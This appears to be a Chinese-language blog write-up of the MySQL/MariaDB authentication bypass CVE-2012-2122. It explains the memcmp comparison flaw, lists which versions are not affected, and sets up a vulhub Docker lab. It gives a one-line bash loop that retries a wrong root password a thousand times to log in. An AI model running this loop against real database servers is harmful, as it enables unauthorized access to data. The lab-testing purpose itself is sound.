Mysql 身份認證繞過漏洞(CVE-2012-2122)
阿新 • • 發佈:2022-05-13
當連線MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。也就是說只要知道使用者名稱,不斷嘗試就能夠直接登入SQL資料庫。
受影響版本:
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
- MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
參考連結:
- http://www.freebuf.com/vuls/3815.html
-
https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/
環境搭建:
啟用vulhub靶場,靶場搭建 ——> https://bbs.zkaq.cn/t/6319.html
執行如下命令啟動測試環境:docker-compose up -d
環境啟動後,將啟動一個Mysql服務(版本:5.5.23),監聽3306埠,通過正常的Mysql客戶端,可以直接登入的,正確root密碼是123456。
漏洞驗證
正常情況我們會做埠掃描,指紋探測:
然後在另一臺linux命令列模式下執行poc:
點選檢視程式碼
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.84.201 -P 3306 ; done #有時候管理員會改預設埠,注意更換
成功登入: